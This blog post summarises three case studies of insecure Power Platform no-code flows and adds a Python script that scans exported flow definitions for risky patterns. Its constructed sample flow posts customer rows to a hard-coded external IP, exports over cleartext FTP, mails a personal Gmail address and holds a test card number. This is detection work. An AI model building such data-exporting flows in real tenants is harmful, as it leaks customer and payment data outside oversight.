SaaS Applications Streamline Application Development and Exploitation

Written by Michael Bargury

Software-as-a-Service (SaaS) applications are built on the premise of streamlining business processes to improve productivity. Microsoft 365, Salesforce, and similar SaaS platforms commonly bundle automation features that let business users build the tooling they need to do their jobs.

The latest iteration of this is the integration of low-code/no-code platforms into these SaaS suites. These platforms let the average business user build and deploy applications with little or no visibility or oversight from IT and security personnel.

In his latest Dark Reading article, “3 Ways No-Code Developers Can Shoot Themselves in the Foot,” Zenity co-founder and CTO Michael Bargury describes some of the many ways in which this can go wrong. He shares three real-world examples of where the abuse of no-code platforms like Microsoft’s Power Platform created significant security concerns for business.

In the first example, Michael explores the story of a customer care team that took it upon itself to manage integrations and data sharing with a third-party vendor, using its own Microsoft Power Platform expertise. A year later, the security team discovered that the integration was bulk-exfiltrating sensitive customer data to an unknown, hard-coded IP address over FTP, a protocol that carries both credentials and payload in cleartext.

The second case study describes an HR team that used Microsoft Power Platform to run a program in which the company matched employee gifts to charitable foundations. The app reduced the HR team's workload and produced a record-breaking campaign, but the security team was not as lucky. It discovered that credit card information had been collected without authorization and stored in plaintext in an environment accessible to employees, vendors, and contractors, which led to significant data cleanup and remediation work to keep the company compliant with PCI DSS.

A final, widespread issue is the use of personal email for business purposes, including copying email and calendar data from business to personal accounts. A flow built from a ready-made Power Platform template does this automatically, and because the copy is made by a connector action rather than a mailbox forwarding rule, controls that block or alert on external auto-forwarding do not see it.
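
All three case studies share a root cause: flows nobody on the security team reviewed. One practical check is to export flow definitions and statically triage them for the patterns described above (a cleartext FTP connector, a hard-coded external IP, mail addressed outside the tenant, and card-number literals). The script below is an added example written for this page; it is not code from the Dark Reading article or from Zenity. The sample flow is constructed, and its layout (a definition whose "actions" map names to actions, each with a "type", an "inputs" object, a connector "host" carrying "apiId"/"operationId", and nested "actions" under loops, scopes and condition branches) is an assumption modelled on the general shape of an exported Power Automate definition; the connector identifiers, parameter names and corporate domain are likewise assumptions.

```python
"""Static triage of exported Power Automate flow definitions (added example).

Field names below are assumptions about the exported definition format, not a
documented schema; adjust them to match the definitions your tenant exports.
"""
import ipaddress
import re
from typing import Any, Iterator

CORPORATE_DOMAINS = {"contoso.com"}  # assumption: the tenant's own mail domains
INTERNAL_NETS = [ipaddress.ip_network(n) for n in  # assumption: ranges treated as "inside"
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
RISKY_CONNECTORS = {"shared_ftp": "FTP (credentials and data in cleartext)"}  # assumed apiId suffix

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@([\w-]+\.[\w.-]+)")
PAN_RE = re.compile(r"\b(?:\d[ -]?){13,19}\b")  # digit runs of card-number length


def walk_actions(node: dict) -> Iterator[tuple[str, dict]]:
    """Yield (name, action) for every action, descending into nested loops,
    scopes and both branches of a condition."""
    for name, action in node.get("actions", {}).items():
        yield name, action
        yield from walk_actions(action)
    if isinstance(node.get("else"), dict):
        yield from walk_actions(node["else"])


def strings_in(value: Any) -> Iterator[str]:
    """Yield every string leaf of a nested JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from strings_in(v)
    elif isinstance(value, list):
        for v in value:
            yield from strings_in(v)


def is_external_ip(text: str) -> bool:
    """True for a syntactically valid IPv4 literal outside INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def luhn_ok(digits: str) -> bool:
    """Luhn check, used to separate card numbers from other long digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def triage_flow(definition: dict) -> list[str]:
    """Return one finding per risky pattern found in the flow's actions."""
    findings = []
    for name, action in walk_actions(definition):
        inputs = action.get("inputs", {})
        host = inputs.get("host", {}) if isinstance(inputs, dict) else {}
        connector = str(host.get("apiId", "")).rsplit("/", 1)[-1]
        if connector in RISKY_CONNECTORS:
            findings.append(f"{name}: uses {RISKY_CONNECTORS[connector]} connector")
        for s in strings_in(inputs):
            for ip in IPV4_RE.findall(s):
                if is_external_ip(ip):
                    findings.append(f"{name}: hard-coded external IP {ip}")
            for domain in EMAIL_RE.findall(s):
                if domain.lower() not in CORPORATE_DOMAINS:
                    findings.append(f"{name}: references mailbox outside the tenant ({domain})")
            for run in PAN_RE.findall(s):
                digits = re.sub(r"[ -]", "", run)
                if luhn_ok(digits):
                    findings.append(f"{name}: Luhn-valid card number literal ({digits[:6]}...)")
    return findings


# Constructed sample: a single flow exhibiting the patterns from the three case studies.
SAMPLE_FLOW = {
    "triggers": {"Recurrence": {"type": "Recurrence"}},
    "actions": {
        "Get_rows": {"type": "OpenApiConnection",
                     "inputs": {"host": {"apiId": "/providers/Microsoft.PowerApps/apis/shared_dataverse",
                                         "operationId": "ListRecords"}}},
        "Apply_to_each": {"type": "Foreach", "foreach": "@outputs('Get_rows')?['body/value']",
                          "actions": {
                              "Create_file": {"type": "OpenApiConnection",
                                              "inputs": {"host": {"apiId": "/providers/Microsoft.PowerApps/apis/shared_ftp",
                                                                  "operationId": "CreateFile"},
                                                         "parameters": {"path": "/export/customers.csv",
                                                                        "body": "@items('Apply_to_each')"}}}}},
        "Post_to_vendor": {"type": "Http",
                           "inputs": {"method": "POST", "uri": "http://203.0.113.10/ingest",
                                      "body": "@body('Get_rows')"}},
        "Send_an_email_(V2)": {"type": "OpenApiConnection",
                               "inputs": {"host": {"apiId": "/providers/Microsoft.PowerApps/apis/shared_office365",
                                                   "operationId": "SendEmailV2"},
                                          "parameters": {"emailMessage/To": "m.personal@gmail.com",
                                                         "emailMessage/Subject": "Daily customer export"}}},
        "Compose_receipt": {"type": "Compose",
                            "inputs": "Donor donor@contoso.com card 4111 1111 1111 1111 exp 12/27"},
    },
}

if __name__ == "__main__":
    for finding in triage_flow(SAMPLE_FLOW):
        print(finding)
```

Run against the sample, the script reports the FTP connector even though it is buried inside a loop, the hard-coded vendor IP in the HTTP action, the personal Gmail recipient, and the Luhn-valid card number sitting in a Compose action. The Luhn filter keeps phone numbers and order IDs out of the card-number finding, and the internal-range list keeps intranet addresses out of the IP finding; both lists are meant to be tuned per tenant.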

Low-code and no-code platforms provide significant business benefits, but they must be used carefully and securely. For the full story of each of these case studies, and best practices for securely leveraging no-code in the business, read the full article on Dark Reading.

About the Author

Michael Bargury

Michael is the Co-Founder and CTO of Zenity. He is an industry expert in cybersecurity interested in cloud, SaaS and AppSec. Prior to Zenity, Michael was a senior architect at Microsoft Cloud Security CTO Office, where he founded and headed security product efforts for IoT, APIs, IaC and confidential computing. Michael is leading the OWASP community effort on low-code/no-code security.
